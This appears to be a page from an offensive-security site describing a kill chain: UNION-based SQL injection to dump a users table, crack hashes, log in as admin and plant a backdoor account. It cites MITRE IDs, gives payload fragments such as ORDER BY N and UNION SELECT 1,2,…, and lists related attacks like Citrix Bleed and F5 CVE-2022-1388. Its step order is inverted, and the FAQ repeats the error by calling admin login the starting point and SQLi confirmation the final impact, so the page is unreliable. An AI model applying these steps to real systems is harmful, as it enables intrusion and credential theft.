SQLi (UNION) → DB dump → admin login
Discover a UNION-based SQL injection on a search/listing endpoint, enumerate the schema, dump the users table, and authenticate as an admin.
§ Context
Assumed environment: web app uses raw string concatenation for at least one SQL query. The DB role has read access to the users table. No WAF or a bypassable one.
§ Steps
- 01Authenticate as adminInitial AccessT1078— Valid Accounts
- 02Crack password hashes offlineCredential AccessT1110— Brute Force
- 03Map the app & find injectable paramsReconnaissanceW-RECON-DIRBRUTE— Directory & File Bruteforce
- 04Fingerprint the stack & DBReconnaissanceW-RECON-FINGERPRINT— Tech Stack Fingerprinting
Banner, error messages, DB-specific sleep functions.
- 05Plant a backdoor admin accountPersistenceW-ADMIN-PERSIST— Backdoor Admin Account
- 06Dump users tableCollectionW-SQLI-UNION— SQL Injection — UNION-Based
Include password hash + role columns.
- 07Enumerate schema (information_schema)CollectionW-SQLI-UNION— SQL Injection — UNION-Based
- 08Confirm UNION-based SQLiCollectionW-SQLI-UNION— SQL Injection — UNION-Based
ORDER BY N to count columns, then UNION SELECT 1,2,…
§ References
- T1078Valid Accounts
- T1110Brute Force
§ Frequently asked
- What is the "SQLi (UNION) → DB dump → admin login" attack path?
- Discover a UNION-based SQL injection on a search/listing endpoint, enumerate the schema, dump the users table, and authenticate as an admin. It chains 8 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Authenticate as admin (T1078) — a initial access primitive. Assumed environment: web app uses raw string concatenation for at least one SQL query.
- What is the final impact of this kill-chain?
- The final step lands on Confirm UNION-based SQLi (W-SQLI-UNION), which falls under Collection. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Shared techniques2
Origin IP bypass → direct attack on backend
Find the real origin IP behind the CDN via CT logs / DNS history / SSL fingerprinting. Connect directly to origin, bypassing WAF + caching + rate-limit; run noisy attacks (SQLi / RCE) that the edge would have blocked.
- Shared techniques2
Vesting beneficiary replace → silently drain stream
Bug in a custom vesting contract allows anyone to call setBeneficiary on existing schedules. Replace beneficiary with attacker address; legitimate token stream now flows to attacker until released funds are noticed.
- Shared techniques2
Dev workstation → cloud backup keys → encrypted vault store (LastPass 2022)
Attacker compromised a single LastPass DevOps engineer's home machine via outdated Plex Media Server, harvested AWS keys for the encrypted-vault backup bucket, exfiltrated production vault data.
- Shared techniques2
ERC-4337 paymaster sponsor drain
A paymaster sponsors all UserOperations without per-user gas accounting. Spam tiny UserOps from many bundled addresses — paymaster pays the gas until its deposit hits zero.
- Shared techniques2
F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB
Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.
- Shared techniques2
Citrix Bleed → steal authenticated session → MFA bypass
Send a long Host header to a vulnerable NetScaler — memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN.